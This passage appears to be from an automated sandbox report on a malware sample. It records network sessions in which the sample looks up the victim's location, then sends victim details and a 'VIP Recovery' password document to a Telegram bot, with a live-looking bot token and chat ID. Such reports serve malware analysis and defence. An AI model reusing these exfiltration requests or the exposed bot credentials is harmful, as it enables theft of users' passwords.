                                    2024-08-13 18:25:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.2249186188.114.97.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:14 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:14 UTC708INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:14 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10617
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xPZnzvcUEyuJlmQY3AfkjM7IO6CSKlHk292xENU9A9NWZlvIvQgctWASAd%2FfKAUvjXO%2F7%2FRdzjgXYPr9MpPxln9swIcbL0Z1mOqTA4HIb6wymmLmuzBwYMVbRHaFlM8KI%2Fo2xT1Y"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abf218f26c32c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.2249188188.114.96.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:17 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    2024-08-13 18:25:18 UTC708INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:17 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10620
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Hu7rvGr%2BlqJihS6uq2jjgiAR47Owqa5ZosHZccCDZ%2BUoxnYLMXlYRbzircZjFJf%2FL4s8Q0n5EPVk5Q%2BPmwI95EhTgNPCawEXygx86gKu86v7OxwkqOFMFYA1YbhPfWeVW9E0ybg"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abf333bf5424c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.2249190188.114.97.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:19 UTC706INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:19 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10622
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTcXlxnaUywAeluNvmYfbdWVdMTZPhrPofCH%2B4pPG%2FdiUSOrLktNPRRDs%2BAlEOIga7I0H46Bqb6udB40MNeJVvvLOCkKch223fUVr1kL7bqQH70SgopqlKaw7TbIh3nRexHJ4LrC"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abf4288292394-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.2249192188.114.97.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:21 UTC704INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:21 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10624
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0kyuK18hPvI5nxiXbsj7pyXe8mXAg7d6HNPmcJ5u6w0a2pJa14lsUNniXQYNUuUH4V7wjeHREdqO%2F5gI82YXztDeTkJ6YFLNxY7%2Fkagm45DpDT3HFryggkMtHgStDjzp2SnDMsa"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abf4bbd147d26-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.2249195188.114.96.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:26 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:26 UTC702INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:26 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10629
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jLTVZT6Ue7MEOpG%2BqkpyitEUr8BMBeN8lfUIekt0BorniaGvgAeBktL19w5hDWtQqVR5PdJVvylK9s4vKVaQI8ZWh1tVy5uViOSxcC9L9LbOFk3rCdSegfkGnmDKsqI2RQWM97J4"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abf6e9b48c434-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.2249197188.114.96.34433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:32 UTC706INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:32 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10635
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9WjhMy0NzbvMJIrsZ0MLvqf43O80DScBFHsL%2BrLoUrksAUKrcSGzJih59hX5reW4xZ9LVpejnMxDX5UeeKFbIpWv3DeWmREaGvj80BycEdfGMvHxZE5HNrjG0r%2F2dH0GOUtGLR%2F"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abf91b9b14316-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.2249198188.114.97.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:32 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    2024-08-13 18:25:32 UTC704INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:32 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10635
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bpkkcWbIE2Pb3kxew5xW83voHobJfcXymvMhSEWUki8j%2BK9Wq1XINEmz5xga7DOOBAqIqh7lHB%2FFfKW8SH6tGNSx4FUrAx3FnuXnAiTbk8HhkJUYqyRdKJNtQxVs6SRPUJuoe1qo"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abf91fd304411-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.2249199149.154.167.2204433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:33 UTC352OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/14/2024%20/%207:15:53%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                    Host: api.telegram.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:33 UTC344INHTTP/1.1 404 Not Found
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:33 GMT
                                    Content-Type: application/json
                                    Content-Length: 55
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:33 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.2249201188.114.97.34433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                    Host: reallyfreegeoip.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:37 UTC704INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:37 GMT
                                    Content-Type: application/xml
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    access-control-allow-origin: *
                                    vary: Accept-Encoding
                                    Cache-Control: max-age=86400
                                    CF-Cache-Status: HIT
                                    Age: 10640
                                    Last-Modified: Tue, 13 Aug 2024 15:28:17 GMT
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YxPUVlkTh6qII1QOxsCg5zKfxYpq62XKM%2Bs64GIFmbETttHIktbSdrIKetHEe7yEeZWiWYwzZWVVMPZtQzZNWC%2FhEF9FV60ok5p4HiHX39GLS8yROecXg45FKRWETfdLBSidurm8"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8b2abfb1bddf43d0-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-08-13 18:25:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                    2024-08-13 18:25:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    21192.168.2.2249202149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:38 UTC352OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/15/2024%20/%207:26:06%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                    Host: api.telegram.org
                                    Connection: Keep-Alive
                                    2024-08-13 18:25:39 UTC344INHTTP/1.1 404 Not Found
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:25:39 GMT
                                    Content-Type: application/json
                                    Content-Length: 55
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:25:39 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    22192.168.2.2249204149.154.167.2204433620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:25:49 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbd929eb213d3
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
